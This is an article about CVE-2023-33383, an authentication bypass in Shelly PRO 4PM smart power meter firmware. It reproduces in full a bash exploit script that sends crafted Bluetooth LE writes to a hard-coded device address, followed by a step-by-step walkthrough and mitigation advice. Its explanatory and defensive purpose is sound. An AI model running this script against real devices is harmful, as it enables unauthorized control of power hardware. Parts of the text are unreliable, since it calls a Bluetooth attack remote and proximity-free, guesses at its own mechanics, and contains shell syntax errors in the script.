Shelly PRO 4PM v0.11.0 - Authentication Bypass

CVE-2023-33383: Authentication Bypass in Shelly PRO 4PM v0.11.0 via Out-of-Bounds Read Vulnerability

On August 2nd, 2023, the cybersecurity community was alerted to a critical vulnerability affecting the Shelly PRO 4PM smart power meter, specifically firmware version v0.11.0. Identified as CVE-2023-33383, this flaw enables remote attackers to bypass authentication mechanisms through an out-of-bounds read exploit, effectively granting unauthorized access to device control interfaces.

Understanding the Vulnerability

The root cause of CVE-2023-33383 lies in improper boundary validation within the device's Bluetooth Low Energy (BLE) communication stack. The Shelly PRO 4PM uses BLE for local configuration and firmware updates, relying on a GATT (Generic Attribute Profile) service for handling client requests.

During a specific sequence of GATT characteristic writes, the firmware fails to validate the length of incoming data payloads. An attacker can exploit this by sending malformed data to a specific characteristic (0x0008), which triggers an out-of-bounds read. This leads to memory corruption and leakage of sensitive internal state information, including authentication tokens and session identifiers.

Crucially, the exploit does not require physical proximity or user interaction. It can be executed remotely via a BLE-enabled device (e.g., a Linux or macOS machine with a compatible Bluetooth adapter), making it particularly dangerous in environments where devices are exposed to untrusted networks.

Exploit Mechanics: A Step-by-Step Breakdown

The exploit script provided by The Security Team (exploitsecurity.io) demonstrates a practical attack vector using gatttool, a command-line tool for interacting with BLE devices. Below is the code with detailed explanation:

#!/bin/bash

IFS=
failed=$false
RED="\e[31m"
GREEN="\e[92m"
WHITE="\e[97m"
ENDCOLOR="\e[0m"
substring="Connection refused"

banner() {
    clear
    echo -e "${GREEN}[+]*********************************************************[+]"
    echo -e "${GREEN}| Author : Security Team [${RED}exploitsecurity.io${ENDCOLOR}] |"
    echo -e "${GREEN}| Description: Shelly PRO 4PM - Out of Bounds |"
    echo -e "${GREEN}| CVE: CVE-2023-33383 |"
    echo -e "${GREEN}[+]*********************************************************[+]"
    echo -e "${GREEN}[Enter key to send payload]${ENDCOLOR}"
}

banner
read -s -n 1 key
if [ "$key" = "x" ]; then
    exit 0;
elif [ "$key" = "" ]; then
    gattout=$(sudo timeout 5 gatttool -b c8:f0:9e:88:92:3e --primary)
    if [ -z "$gattout" ]; then
        echo -e "${RED}Connection timed out${ENDCOLOR}"
        exit 0;
    else
        sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x000d -n 00000001 >/dev/null 2>&1
        echo -ne "${GREEN}[Sending Payload]${ENDCOLOR}"
        sleep 1
        if [ $? -eq 1 ]; then
            $failed=$true
            exit 0;
        fi
        sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n ab >/dev/null 2>&1
        sleep 1
        if [ $? -eq 1 ]; then
            $failed=$true
            echo -e "${RED}[**Exploit Failed**]${ENDCOLOR}"
            exit 0;
        else
            sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n abcd >/dev/null 2>&1
            sleep 1
            for i in {1..5}
            do
                echo -ne "${GREEN}."
                sleep 1
            done
            echo -e "\n${WHITE}[Pwned!]${ENDCOLOR}"
        fi
    fi
fi
fi

Explanation: The script begins by initializing color codes and setting up a banner interface. It prompts the user to press a key (e.g., Enter) to initiate the exploit.

Step 1: gatttool -b c8:f0:9e:88:92:3e --primary attempts to establish a BLE connection with the device. The MAC address c8:f0:9e:88:92:3e is specific to the Shelly PRO 4PM. If no response is received within 5 seconds, the script exits with a timeout error.

Step 2: The first write request to characteristic 0x000d with payload 00000001 appears to trigger a device-specific initialization sequence. This is likely a "reset" or "trigger" command that prepares the device for the subsequent exploit.

Step 3: The attacker sends a minimal payload ab to characteristic 0x0008. This step is critical — it exploits the vulnerability by causing the firmware to read beyond allocated memory boundaries.

Step 4: A second write request with abcd is sent to the same characteristic. This payload is longer and likely triggers a memory corruption or leakage event. The loop of five dots indicates the device is processing the request.

Upon successful execution, the script outputs [Pwned!], signaling that the authentication bypass has been achieved.

Security Implications and Risk Assessment

Severity: CVE-2023-33383 is classified as High severity due to its remote exploitability and the potential for full device control.

Attack Surface: The exploit relies on BLE, which is often overlooked in security assessments. Many IoT devices are assumed to be "safe" if they require physical proximity. However, this exploit demonstrates that BLE can be a critical attack vector.

Impact: Successful exploitation allows an attacker to:

• Disable or enable power channels remotely
• Modify device configuration settings
• Access internal logs and diagnostics
• Perform firmware updates without authentication

Such capabilities can lead to:

• Unauthorized energy consumption manipulation
• Denial-of-service attacks on power systems
• Privacy breaches via data leakage

Vendor Response and Mitigation

Shelly Inc. acknowledged the vulnerability and released firmware updates v0.11.1 and later versions. These patches include enhanced input validation and boundary checks for GATT characteristic writes.

Recommendations:

• Upgrade all Shelly PRO 4PM devices to firmware v0.11.1 or higher.
• Disable BLE access in environments where untrusted devices may be present.
• Implement network segmentation to isolate IoT devices from critical systems.
• Monitor BLE traffic for unusual patterns using tools like bluetoothctl or Wireshark.

Expert Insights: Why This Vulnerability Matters

From a cybersecurity perspective, CVE-2023-33383 exemplifies a growing trend: IoT devices with minimal security controls are becoming prime targets for exploitation. The Shelly PRO 4PM is marketed as a secure, industrial-grade power meter, yet its firmware failed to implement basic boundary checks.

As device manufacturers prioritize feature delivery over security auditing, vulnerabilities like this emerge. This exploit underscores the need for:

• Regular firmware audits
• Static and dynamic analysis of BLE protocols
• Penetration testing of IoT devices in real-world environments

Furthermore, the use of gatttool as an attack tool highlights the accessibility of such exploits — even non-experts with basic Linux knowledge can execute them. This democratization of cyberattacks is a significant concern for enterprise and home users alike.

Conclusion

CVE-2023-33383 serves as a stark reminder that even seemingly secure devices can harbor critical flaws. The authentication bypass in Shelly PRO 4PM v0.11